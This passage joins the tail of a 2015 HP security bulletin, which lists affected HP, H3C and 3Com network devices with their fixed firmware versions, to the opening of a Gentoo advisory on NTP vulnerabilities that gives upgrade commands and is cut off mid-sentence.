5800-24G-SFP TAA\nSwitch w 1 Intf Slt, JG257A HP 5800-48G-PoE+ TAA Switch with 1 Slot, JG258A\nHP 5800-48G TAA Switch w 1 Intf Slot\n H3C S5800-32C - 24-port 1BT Plus 4-port (SFP Plus ) Plus 1 media slot\n(0235A36U), H3C S5800-32C-PWR - 24-port 10/100/1000BASE-T (RJ45) Plus 4-port\n10GBASE-X (SFP Plus ) Plus 1 media module PoE (0235A36S), H3C S5800-32F\n24-port 1000BASE-X (SFP) Plus 4-port 10GBASE-X (SFP Plus ) Plus media module\n(no power) (0235A374), H3C S5800-56C 48-port 10/100/1000BASE-T (RJ45) Plus\n4port 10GBASE-X (SFP Plus ) Plus media module (0235A379), H3C S5800-56C-PWR\n48-port BT Plus 4 port (SFP Plus ) Plus media module (0235A378), H3C\nS5800-60C-PWR 48-port BT Plus 4-port SFP Plus 2 media modules Plus OSM\n(0235A36W)\n N/A\n\n5500 HI Switch Series\n R5501P06\n JG311A HP HI 5500-24G-4SFP w/2 Intf Slts Switch, JG312A HP HI 5500-48G-4SFP\nw/2 Intf Slts Switch, JG541A HP 5500-24G-PoE+-4SFP HI Switch w/2 Slt, JG542A\nHP 5500-48G-PoE+-4SFP HI Switch w/2 Slt, JG543A HP 5500-24G-SFP HI Switch w/2\nIntf Slt, JG679A HP 5500-24G-PoE+-4SFP HI TAA Swch w/2Slt, JG680A HP\n5500-48G-PoE+-4SFP HI TAA Swch w/2Slt, JG681A HP 5500-24G-SFP HI TAA Swch\nw/2Slt\n N/A\n N/A\n\n5500 EI Switch Series\n R2221P08\n JD373A HP 5500-24G DC EI Switch, JD374A HP 5500-24G-SFP EI Switch, JD375A HP\n5500-48G EI Switch, JD376A HP 5500-48G-PoE EI Switch, JD377A HP 5500-24G EI\nSwitch, JD378A HP 5500-24G-PoE EI Switch, JD379A HP 5500-24G-SFP DC EI\nSwitch, JG240A HP 5500-48G-PoE+ EI Switch w/2 Intf Slts, JG241A HP\n5500-24G-PoE+ EI Switch w/2 Intf Slts, JG249A HP 5500-24G-SFP EI TAA Switch w\n2 Slts, JG250A HP 5500-24G EI TAA Switch w 2 Intf Slts, JG251A HP 5500-48G EI\nTAA Switch w 2 Intf Slts, JG252A HP 5500-24G-PoE+ EI TAA Switch w/2 Slts,\nJG253A HP 5500-48G-PoE+ EI TAA Switch w/2 Slts\n H3C S5500-28C-EI Ethernet Switch (0235A253), H3C S5500-28F-EI Eth Switch AC\nSingle (0235A24U), H3C S5500-52C-EI Ethernet Switch (0235A24X), H3C\nS5500-28C-EI-DC Ethernet Switch (0235A24S), H3C S5500-28C-PWR-EI Ethernet\nSwitch (0235A255), H3C S5500-28F-EI Eth Swtch DC Single Pwr (0235A259), H3C\nS5500-52C-PWR-EI Ethernet Switch (0235A251)\n N/A\n\n5500 SI Switch Series\n R2221P08\n JD369A HP 5500-24G SI Switch, JD370A HP 5500-48G SI Switch, JD371A HP\n5500-24G-PoE SI Switch, JD372A HP 5500-48G-PoE SI Switch, JG238A HP\n5500-24G-PoE+ SI Switch w/2 Intf Slts, JG239A HP 5500-48G-PoE+ SI Switch w/2\nIntf Slts\n H3C S5500-28C-SI Ethernet Switch (0235A04U), H3C S5500-52C-SI Ethernet\nSwitch (0235A04V), H3C S5500-28C-PWR-SI Ethernet Switch (0235A05H), H3C\nS5500-52C-PWR-SI Ethernet Switch (0235A05J)\n N/A\n\n5130 EI switch Series\n Fix in Progress, Use Mitigation\n JG932A HP 5130-24G-4SFP+ EI Switch, JG933A HP 5130-24G-SFP-4SFP+ EI Switch,\nJG934A HP 5130-48G-4SFP+ EI Switch, JG936A HP 5130-24G-PoE+-4SFP+ EI Swch,\nJG937A HP 5130-48G-PoE+-4SFP+ EI Swch, JG975A HP 5130-24G-4SFP+ EI BR Switch,\nJG976A HP 5130-48G-4SFP+ EI BR Switch, JG977A HP 5130-24G-PoE+-4SFP+ EI BR\nSwch, JG978A HP 5130-48G-PoE+-4SFP+ EI BR Swch\n\n5120 EI Switch Series\n R2221P08\n JE066A HP 5120-24G EI Switch, JE067A HP 5120-48G EI Switch, JE068A HP\n5120-24G EI Switch with 2 Slots, JE069A HP 5120-48G EI Switch with 2 Slots,\nJE070A HP 5120-24G-PoE EI Switch with 2 Slots, JE071A HP 5120-48G-PoE EI\nSwitch with 2 Slots, JG236A HP 5120-24G-PoE+ EI Switch w/2 Intf Slts, JG237A\nHP 5120-48G-PoE+ EI Switch w/2 Intf Slts, JG245A HP 5120-24G EI TAA Switch w\n2 Intf Slts, JG246A HP 5120-48G EI TAA Switch w 2 Intf Slts, JG247A HP\n5120-24G-PoE+ EI TAA Switch w 2 Slts, JG248A HP 5120-48G-PoE+ EI TAA Switch w\n2 Slts\n H3C S5120-24P-EI 24GE Plus 4ComboSFP (0235A0BQ), H3C S5120-28C-EI 24GE Plus\n4Combo Plus 2Slt (0235A0BS), H3C S5120-48P-EI 48GE Plus 4ComboSFP (0235A0BR),\nH3C S5120-52C-EI 48GE Plus 4Combo Plus 2Slt (0235A0BT), H3C S5120-28C-PWR-EI\n24G Plus 4C Plus 2S Plus POE (0235A0BU), H3C S5120-52C-PWR-EI 48G Plus 4C\nPlus 2S Plus POE (0235A0BV)\n\n5120 SI switch Series\n Fix in Progress, Use Mitigation\n JE072A HP 5120-48G SI Switch, JE073A HP 5120-16G SI Switch, JE074A HP\n5120-24G SI Switch, JG091A HP 5120-24G-PoE+ (370W) SI Switch, JG092A HP\n5120-24G-PoE+ (170W) SI Switch\n H3C S5120-52P-SI 48GE Plus 4 SFP (0235A41W), H3C S5120-20P-SI L2, 16GE Plus\n4SFP (0235A42B), H3C S5120-28P-SI 24GE Plus 4 SFP (0235A42D), H3C\nS5120-28P-HPWR-SI (0235A0E5), H3C S5120-28P-PWR-SI (0235A0E3)\n\n4800 G Switch Series\n R2221P08\n JD007A HP 4800-24G Switch, JD008A HP 4800-24G-PoE Switch, JD009A HP\n4800-24G-SFP Switch, JD010A HP 4800-48G Switch, JD011A HP 4800-48G-PoE Switch\n N/A\n 3Com Switch 4800G 24-Port (3CRS48G-24-91), 3Com Switch 4800G 24-Port SFP\n(3CRS48G-24S-91), 3Com Switch 4800G 48-Port (3CRS48G-48-91), 3Com Switch\n4800G PWR 24-Port (3CRS48G-24P-91), 3Com Switch 4800G PWR 48-Port\n(3CRS48G-48P-91)\n\n4510G Switch Series\n R2221P08\n JF428A HP 4510-48G Switch, JF847A HP 4510-24G Switch\n N/A\n 3Com Switch 4510G 48 Port (3CRS45G-48-91), 3Com Switch 4510G PWR 24-Port\n(3CRS45G-24P-91), 3Com Switch E4510-24G (3CRS45G-24-91)\n\n4210G Switch Series\n R2221P08\n JF844A HP 4210-24G Switch, JF845A HP 4210-48G Switch, JF846A HP 4210-24G-PoE\nSwitch\n N/A\n 3Com Switch 4210-24G (3CRS42G-24-91), 3Com Switch 4210-48G (3CRS42G-48-91),\n3Com Switch E4210-24G-PoE (3CRS42G-24P-91)\n\n3610 Switch Series\n Fix in Progress, Use Mitigation\n JD335A HP 3610-48 Switch, JD336A HP 3610-24-4G-SFP Switch, JD337A HP\n3610-24-2G-2G-SFP Switch, JD338A HP 3610-24-SFP Switch\n H3C S3610-52P - model LS-3610-52P-OVS (0235A22C), H3C S3610-28P - model\nLS-3610-28P-OVS (0235A22D), H3C S3610-28TP - model LS-3610-28TP-OVS\n(0235A22E), H3C S3610-28F - model LS-3610-28F-OVS (0235A22F)\n N/A\n\n3600 V2 Switch Series\n R2110P03\n JG299A HP 3600-24 v2 EI Switch, JG300A HP 3600-48 v2 EI Switch, JG301A HP\n3600-24-PoE+ v2 EI Switch, JG301B HP 3600-24-PoE+ v2 EI Switch, JG302A HP\n3600-48-PoE+ v2 EI Switch, JG302B HP 3600-48-PoE+ v2 EI Switch, JG303A HP\n3600-24-SFP v2 EI Switch, JG304A HP 3600-24 v2 SI Switch, JG305A HP 3600-48\nv2 SI Switch, JG306A HP 3600-24-PoE+ v2 SI Switch, JG306B HP 3600-24-PoE+ v2\nSI Switch, JG307A HP 3600-48-PoE+ v2 SI Switch, JG307B HP 3600-48-PoE+ v2 SI\nSwitch\n N/A\n N/A\n\n3100V2\n R5203P11\n JD313B HP 3100-24-PoE v2 EI Switch, JD318B HP 3100-8 v2 EI Switch, JD319B HP\n3100-16 v2 EI Switch, JD320B HP 3100-24 v2 EI Switch, JG221A HP 3100-8 v2 SI\nSwitch, JG222A HP 3100-16 v2 SI Switch, JG223A HP 3100-24 v2 SI Switch\n N/A\n N/A\n\n3100V2-48\n R2110P03\n JG315A HP 3100-48 v2 Switch\n N/A\n N/A\n\n1920\n Fix in Progress, Use Mitigation\n JG920A HP 1920-8G Switch, JG921A HP 1920-8G-PoE+ (65W) Switch, JG922A HP\n1920-8G-PoE+ (180W) Switch, JG923A HP 1920-16G Switch, JG924A HP 1920-24G\nSwitch, JG925A HP 1920-24G-PoE+ (180W) Switch, JG926A HP 1920-24G-PoE+ (370W)\nSwitch, JG927A HP 1920-48G Switch\n\n1910 R11\n Fix in Progress, Use Mitigation\n JG536A HP 1910-8 Switch, JG537A HP 1910-8 -PoE+ Switch, JG538A HP 1910-24\nSwitch, JG539A HP 1910-24-PoE+ Switch, JG540A HP 1910-48 Switch\n N/A\n N/A\n\n1910 R15\n Fix in Progress, Use Mitigation\n JE005A HP 1910-16G Switch, JE006A HP 1910-24G Switch, JE007A HP 1910-24G-PoE\n(365W) Switch, JE008A HP 1910-24G-PoE(170W) Switch, JE009A HP 1910-48G\nSwitch, JG348A HP 1910-8G Switch, JG349A HP 1910-8G-PoE+ (65W) Switch, JG350A\nHP 1910-8G-PoE+ (180W) Switch\n N/A\n N/A\n\n1620\n Fix in Progress, Use Mitigation\n JG912A HP 1620-8G Switch, JG913A HP 1620-24G Switch, JG914A HP 1620-48G\nSwitch\n N/A\n N/A\n\nMSR20-1X\n Fix in Progress, Use Mitigation\n JD431A HP MSR20-10 Router, JD667A HP MSR20-15 IW Multi-Service Router,\nJD668A HP MSR20-13 Multi-Service Router, JD669A HP MSR20-13 W Multi-Service\nRouter, JD670A HP MSR20-15 A Multi-Service Router, JD671A HP MSR20-15 AW\nMulti-Service Router, JD672A HP MSR20-15 I Multi-Service Router, JD673A HP\nMSR20-11 Multi-Service Router, JD674A HP MSR20-12 Multi-Service Router,\nJD675A HP MSR20-12 W Multi-Service Router, JD676A HP MSR20-12 T1\nMulti-Service Router, JF236A HP MSR20-15-I Router,JF237A HP MSR20-15-A\nRouter, JF238A HP MSR20-15-I-W Router,JF239A HP MSR20-11 Router, JF240A HP\nMSR20-13 Router,JF241A HP MSR20-12 Router, JF806A HP MSR20-12-T Router,JF807A\nHP MSR20-12-W Router, JF808A HP MSR20-13-W Router,JF809A HP MSR20-15-A-W\nRouter, JF817A HP MSR20-15 Router,JG209A HP MSR20-12-T-W Router (NA), JG210A\nHP MSR20-13-W Router (NA)\n H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1 ADSLoPOTS 1 DSIC (0235A0A8), H3C\nMSR 20-10 (0235A0A7),H3C RT-MSR2011-AC-OVS-H3 (0235A395), H3C\nRT-MSR2012-AC-OVS-H3 (0235A396),H3C RT-MSR2012-AC-OVS-W-H3 (0235A397), H3C\nRT-MSR2012-T-AC-OVS-H3 (0235A398),H3C RT-MSR2013-AC-OVS-H3 (0235A390), H3C\nRT-MSR2013-AC-OVS-W-H3 (0235A391),H3C RT-MSR2015-AC-OVS-A-H3 (0235A392), H3C\nRT-MSR2015-AC-OVS-AW-H3 (0235A393),H3C RT-MSR2015-AC-OVS-I-H3 (0235A394), H3C\nRT-MSR2015-AC-OVS-IW-H3 (0235A38V),H3C MSR 20-11 (0235A31V), H3C MSR 20-12\n(0235A32E),H3C MSR 20-12 T1 (0235A32B),H3C MSR 20-13 (0235A31W) , H3C MSR\n20-13 W (0235A31X),H3C MSR 20-15 A (0235A31Q), H3C MSR 20-15 A W\n(0235A31R),H3C MSR 20-15 I (0235A31N), H3C MSR 20-15 IW (0235A31P),H3C\nMSR20-12 W (0235A32G)\n N/A\n\nMSR30\n Fix in Progress, Use Mitigation\n JD654A HP MSR30-60 POE Multi-Service Router, JD657A HP MSR30-40\nMulti-Service Router, JD658A HP MSR30-60 Multi-Service Router, JD660A HP\nMSR30-20 POE Multi-Service Router, JD661A HP MSR30-40 POE Multi-Service\nRouter, JD666A HP MSR30-20 Multi-Service Router, JF229A HP MSR30-40\nRouter,JF230A HP MSR30-60 Router, JF232A HP RT-MSR3040-AC-OVS-AS-H3, JF235A\nHP MSR30-20 DC Router,JF284A HP MSR30-20 Router, JF287A HP MSR30-40 DC\nRouter,JF801A HP MSR30-60 DC Router, JF802A HP MSR30-20 PoE Router,JF803A HP\nMSR30-40 PoE Router, JF804A HP MSR30-60 PoE Router\n H3C MSR 30-20 Router (0235A328),H3C MSR 30-40 Router Host(DC) (0235A268),\nH3C RT-MSR3020-AC-POE-OVS-H3 (0235A322),H3C RT-MSR3020-DC-OVS-H3 (0235A267),\nH3C RT-MSR3040-AC-OVS-H (0235A299),H3C RT-MSR3040-AC-POE-OVS-H3 (0235A323),\nH3C RT-MSR3060-AC-OVS-H3 (0235A320),H3C RT-MSR3060-AC-POE-OVS-H3 (0235A296),\nH3C RT-MSR3060-DC-OVS-H3 (0235A269),H3C MSR 30-20 RTVZ33020AS Router Host(AC)\n(0235A20S), H3C MSR 30-20 (0235A19L),H3C MSR 30-20 POE (0235A239), H3C MSR\n30-40 (0235A20J),H3C MSR 30-40 POE (0235A25R), H3C MSR 30-60 (0235A20K),H3C\nMSR 30-60 POE (0235A25S), H3C RT-MSR3040-AC-OVS-AS-H3 (0235A20V)\n N/A\n\nMSR30-16\n Fix in Progress, Use Mitigation\n JD659A HP MSR30-16 POE Multi-Service Router, JD665A HP MSR30-16\nMulti-Service Router, JF233A HP MSR30-16 Router, JF234A HP MSR30-16 PoE\nRouter\n H3C RT-MSR3016-AC-OVS-H3 (0235A327), H3C RT-MSR3016-AC-POE-OVS-H3\n(0235A321), H3C MSR 30-16 (0235A237), H3C MSR 30-16 POE (0235A238)\n N/A\n\nMSR30-1X\n Fix in Progress, Use Mitigation\n JF800A HP MSR30-11 Router, JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr,\nJG182A HP MSR30-11E Router, JG183A HP MSR30-11F Router, JG184A HP MSR30-10 DC\nRouter\n H3C MSR 30-10 Router Host(AC) 2FE 2SIC 1XMIM 256DDR (0235A39H), H3C\nRT-MSR3011-AC-OVS-H3 (0235A29L)\n N/A\n\nMSR50\n Fix in Progress, Use Mitigation\n JD433A HP MSR50-40 Router, JD653A HP MSR50 Processor Module, JD655A HP\nMSR50-40 Multi-Service Router, JD656A HP MSR50-60 Multi-Service Router,\nJF231A HP MSR50-60 Router, JF285A HP MSR50-40 DC Router, JF640A HP MSR50-60\nRtr Chassis w DC PwrSupply\n H3C MSR 50-40 Router (0235A297), H3C MSR5040-DC-OVS-H3C (0235A20P), H3C\nRT-MSR5060-AC-OVS-H3 (0235A298), H3C MSR 50-40 Chassis (0235A20N), H3C MSR\n50-60 Chassis (0235A20L)\n N/A\n\nMSR50-G2\n Fix in Progress, Use Mitigation\n JD429A HP MSR50 G2 Processor Module, JD429B HP MSR50 G2 Processor Module\n H3C H3C MSR 50 Processor Module-G2 (0231A84Q), H3C MSR 50 High Performance\nMain Processing Unit 3GE (Combo) 256F/1GD(0231A0KL)\n N/A\n\nMSR20 Russian version\n Fix in Progress, Use Mitigation\n JD663B HP MSR20-21 Router, JF228A HP MSR20-40 Router, JF283A HP MSR20-20\nRouter\n H3C RT-MSR2020-AC-OVS-H3C (0235A324), H3C RT-MSR2040-AC-OVS-H3 (0235A326)\n N/A\n\nMSR20-1X Russian version\n Fix in Progress, Use Mitigation\n JD431A HP MSR20-10 Router, JF236A HP MSR20-15-I Router, JF237A HP MSR20-15-A\nRouter, JF238A HP MSR20-15-I-W Router, JF239A HP MSR20-11 Router, JF240A HP\nMSR20-13 Router, JF241A HP MSR20-12 Router, JF806A HP MSR20-12-T Router,\nJF807A HP MSR20-12-W Router, JF808A HP MSR20-13-W Router, JF809A HP\nMSR20-15-A-W Router, JF817A HP MSR20-15 Router\n H3C MSR 20-10 (0235A0A7), H3C RT-MSR2015-AC-OVS-I-H3 (0235A394), H3C\nRT-MSR2015-AC-OVS-A-H3 (0235A392), H3C RT-MSR2015-AC-OVS-AW-H3 (0235A393),\nH3C RT-MSR2011-AC-OVS-H3 (0235A395),H3C RT-MSR2013-AC-OVS-H3 (0235A390), H3C\nRT-MSR2012-AC-OVS-H3 (0235A396), H3C RT-MSR2012-T-AC-OVS-H3 (0235A398), H3C\nRT-MSR2012-AC-OVS-W-H3 (0235A397), H3C RT-MSR2013-AC-OVS-W-H3 (0235A391), H3C\nRT-MSR2015-AC-OVS-IW-H3 (0235A38V), H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW\n1 ADSLoPOTS 1 DSIC (0235A0A8)\n N/A\n\nMSR30 Russian version\n Fix in Progress, Use Mitigation\n JF229A HP MSR30-40 Router, JF230A HP MSR30-60 Router, JF235A HP MSR30-20 DC\nRouter, JF284A HP MSR30-20 Router, JF287A HP MSR30-40 DC Router, JF801A HP\nMSR30-60 DC Router, JF802A HP MSR30-20 PoE Router, JF803A HP MSR30-40 PoE\nRouter, JF804A HP MSR30-60 PoE Router\n H3C RT-MSR3040-AC-OVS-H (0235A299), H3C RT-MSR3060-AC-OVS-H3 (0235A320), H3C\nRT-MSR3020-DC-OVS-H3 (0235A267), H3C MSR 30-20 Router (0235A328), H3C MSR\n30-40 Router Host(DC) (0235A268), H3C RT-MSR3060-DC-OVS-H3 (0235A269), H3C\nRT-MSR3020-AC-POE-OVS-H3 (0235A322), H3C RT-MSR3040-AC-POE-OVS-H3 (0235A323),\nH3C RT-MSR3060-AC-POE-OVS-H3 (0235A296)\n N/A\n\nMSR30-16 Russian version\n Fix in Progress, Use Mitigation\n JF233A HP MSR30-16 Router, JF234A HP MSR30-16 PoE Router\n H3C RT-MSR3016-AC-OVS-H3 (0235A327), H3C RT-MSR3016-AC-POE-OVS-H3 (0235A321)\n N/A\n\nMSR30-1X Russian version\n Fix in Progress, Use Mitigation\n JF800A HP MSR30-11 Router, JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr,\nJG182A HP MSR30-11E Router, JG183A HP MSR30-11F Router, JG184A HP MSR30-10 DC\nRouter\n H3C RT-MSR3011-AC-OVS-H3 (0235A29L), H3C MSR 30-10 Router Host(AC) 2FE 2SIC\n1XMIM 256DDR (0235A39H)\n N/A\n\nMSR50 Russian version\n Fix in Progress, Use Mitigation\n JD433A HP MSR50-40 Router, JD653A HP MSR50 Processor Module, JD655A HP\nMSR50-40 Multi-Service Router, JD656A HP MSR50-60 Multi-Service Router,\nJF231A HP MSR50-60 Router, JF285A HP MSR50-40 DC Router, JF640A HP MSR50-60\nRtr Chassis w DC PwrSupply\n H3C MSR 50-40 Router (0235A297), H3C MSR 50 Processor Module (0231A791), H3C\nMSR 50-40 Chassis (0235A20N), H3C MSR 50-60 Chassis (0235A20L), H3C\nRT-MSR5060-AC-OVS-H3 (0235A298), H3C MSR5040-DC-OVS-H3C (0235A20P)\n N/A\n\nMSR50 G2 Russian version\n Fix in Progress, Use Mitigation\n JD429B HP MSR50 G2 Processor Module\n H3C MSR 50 High Performance Main Processing Unit 3GE (Combo) 256F/1GD\n(0231A0KL)\n N/A\n\nMSR9XX\n Fix in Progress, Use Mitigation\n JF812A HP MSR900 Router, JF813A HP MSR920 Router, JF814A HP MSR900-W Router,\nJF815A HP MSR920 2FEWAN/8FELAN/.11b/g Rtr, JG207A HP MSR900-W Router (NA),\nJG208A HP MSR920-W Router (NA)\n H3C MSR 900 Router with 802.11b/g 2 FE WAN 4 FE LAN 256DDR 802.11b\n(0235A0C2), H3C MSR 900 Router 2 FE WAN 4 FE LAN 256DDR (0235A0BX), H3C MSR\n920 Router with 802.11b/g 2 FE WAN 8 FE LAN 256DDR (0235A0C4), H3C MSR 920\nRouter 2 FE WAN 8 FE LAN 256DDR (0235A0C0)\n N/A\n\nMSR93X\n Fix in Progress, Use Mitigation\n JG512A HP MSR930 Wireless Router , JG513A HP MSR930 3G Router, JG514A HP\nMSR931 Router, JG515A HP MSR931 3G Router, JG516A HP MSR933 Router, JG517A HP\nMSR933 3G Router, JG518A HP MSR935 Router, JG519A HP MSR935 Wireless Router,\nJG520A HP MSR935 3G Router, JG531A HP MSR931 Dual 3G Router, JG596A HP MSR930\n4G LTE/3G CDMA Router, JG597A HP MSR936 Wireless Router, JG665A HP MSR930 4G\nLTE/3G WCDMA Global Router, JG704A HP MSR930 4G LTE/3G WCDMA ATT Router\n N/A\n N/A\n\nMSR1000\n Fix in Progress, Use Mitigation\n JG732A HP MSR1003-8 AC Router\n N/A\n N/A\n\nMSR1000 Russian version\n Fix in Progress, Use Mitigation\n JG732A HP MSR1003-8 AC Router\n N/A\n N/A\n\nMSR2000\n Fix in Progress, Use Mitigation\n JG411A HP MSR2003 AC Router\n N/A\n N/A\n\nMSR3000\n Fix in Progress, Use Mitigation\n JG404A HP MSR3064 Router, JG405A HP MSR3044 Router, JG406A HP MSR3024 AC\nRouter, JG409A HP MSR3012 AC Router, JG861A HP MSR3024 TAA-compliant AC\nRouter\n N/A\n N/A\n\nMSR4000\n Fix in Progress, Use Mitigation\n JG402A HP MSR4080 Router Chassis, JG403A HP MSR4060 Router Chassis, JG412A\nHP MSR4000 MPU-100 Main Processing Unit\n N/A\n N/A\n\nF5000\n Fix in Progress, Use Mitigation\n JG216A HP F5000 Firewall Standalone Chassis, JD259A HP A5000-A5 VPN Firewall\nChassis\n H3C SecPath F5000-A5 Host System (0150A0AG)\n N/A\n\nF5000 C\n R3811P03\n JG650A HP F5000-C VPN Firewall Appliance\n N/A\n N/A\n\nF5000 S\n R3811P03\n JG370A HP F5000-S VPN Firewall Appliance\n N/A\n N/A\n\nU200S and CS\n Fix in Progress, Use Mitigation\n JD268A HP 200-CS UTM Appliance, JD273A HP U200-S UTM Appliance\n H3C SecPath U200-S (0235A36N)\n N/A\n\nU200A and M\n Fix in Progress, Use Mitigation\n JD274A HP 200-M UTM Appliance, JD275A HP U200-A UTM Appliance\n H3C SecPath U200-A (0235A36Q)\n N/A\n\nSecBlade III\n R3820P03\n JG371A HP 12500 20Gbps VPN Firewall Module, JG372A HP 10500/11900/7500\n20Gbps VPN FW Mod\n N/A\n N/A\n\nSecBlade FW\n R3181P05\n JC635A HP 12500 VPN Firewall Module, JD245A HP 9500 VPN Firewall Module,\nJD249A HP 10500/7500 Advanced VPN Firewall Mod, JD250A HP 6600 Firewall\nProcessing Rtr Module, JD251A HP 8800 Firewall Processing Module, JD255A HP\n5820 VPN Firewall Module\n H3C S9500E SecBlade VPN Firewall Module (0231A0AV), H3C S7500E SecBlade VPN\nFirewall Module (0231A832), H3C SR66 Gigabit Firewall Module (0231A88A), H3C\nSR88 Firewall Processing Module (0231A88L), H3C S5820 SecBlade VPN Firewall\nModule (0231A94J)\n N/A\n\nF1000E\n R3181P05\n JD272A HP F1000-E VPN Firewall Appliance\n\nF1000-A\n R3734P06\n JG214A HP F1000-A-EI VPN Firewall Appliance\n\nF1000-S\n R3734P06\n JG213A HP F1000-S-EI VPN Firewall Appliance\n\nVSR1000\n Fix in Progress, Use Mitigation\n JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software,\nJG811AAE HP VSR1001 Comware 7 Virtual Services Router, JG812AAE HP VSR1004\nComware 7 Virtual Services Router, JG813AAE HP VSR1008 Comware 7 Virtual\nServices Router\n N/A\n N/A\n\nWX5002/5004\n Fix in Progress, Use Mitigation\n JD441A HP 5800 ACM for 64-256 APs, JD447B HP WX5002 Access Controller,\nJD448A HP A-WX5004 Access Controller, JD448B HP WX5004 Access Controller,\nJD469A HP A-WX5004 (3Com) Access Controller, JG261A HP 5800 Access Controller\nOAA TAA Mod\n N/A\n N/A\n\nHP 850/870\n Fix in Progress, Use Mitigation\n JG723A HP 870 Unified Wired-WLAN Appliance, JG725A HP 870 Unifd Wrd-WLAN TAA\nApplnc, JG722A HP 850 Unified Wired-WLAN Appliance, JG724A HP 850 Unifd\nWrd-WLAN TAA Applnc\n N/A\n N/A\n\nHP 830\n Fix in Progress, Use Mitigation\n JG640A HP 830 24P PoE+ Unifd Wired-WLAN Swch, JG641A HP 830 8P PoE+ Unifd\nWired-WLAN Swch, JG646A HP 830 24-Port PoE+ Wrd-WLAN TAA Switch, JG647A HP\n830 8-Port PoE+ Wrd-WLAN TAA Switch\n N/A\n N/A\n\nHP 6000\n Fix in Progress, Use Mitigation\n JG639A HP 10500/7500 20G Unified Wired-WLAN Mod, JG645A HP 10500/7500 20G\nUnifd Wrd-WLAN TAA Mod\n N/A\n N/A\n\nVCX\n Fix in Progress, Use Mitigation\n J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr, J9668A HP VCX IPC V7005\nPltfrm w/ DL120 G6 Srvr, JC517A HP VCX V7205 Platform w/DL 360 G6 Server,\nJE355A HP VCX V6000 Branch Platform 9.0, JC516A HP VCX V7005 Platform w/DL\n120 G6 Server, JC518A HP VCX Connect 200 Primry 120 G6 Server, J9669A HP VCX\nIPC V7310 Pltfrm w/ DL360 G7 Srvr, JE341A HP VCX Connect 100 Secondary,\nJE252A HP VCX Connect Primary MIM Module, JE253A HP VCX Connect Secondary MIM\nModule, JE254A HP VCX Branch MIM Module, JE355A HP VCX V6000 Branch Platform\n9.0, JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod, JD023A HP MSR30-40 Router\nwith VCX MIM Module, JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM, JD025A HP\nMSR30-16 RTR w/VCX + 4FXO/2FXS Mod, JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS\nMod, JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod, JD029A HP MSR30-16 RTR\nw/VCX + E1/4BRI/4FXS, JE340A HP VCX Connect 100 Pri Server 9.0, JE342A HP VCX\nConnect 100 Sec Server 9.0\n N/A\n N/A\n\nHISTORY\nVersion:1 (rev.1) - 18 February 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2015 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201412-34\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n Title: NTP: Multiple vulnerabilities\n Date: December 24, 2014\n Bugs: #533076\n ID: 201412-34\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in NTP, the worst of which\ncould result in remote execution of arbitrary code. The net-misc/ntp package contains the official reference\nimplementation by the NTP Project. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/ntp \u003c 4.2.8 \u003e= 4.2.8\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in NTP. Please review the\nCVE identifiers referenced below for details. \n\nResolution\n==========\n\nAll NTP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/ntp-4.2.8\"\n\nReferences\n==========\n\n[ 1 ] CVE-2014-9293\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9293\n[ 2 ] CVE-2014-9294\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9294\n[ 3 ] CVE-2014-9295\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9295\n[ 4 ] CVE-2014-9296\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9296\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201412-34.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of 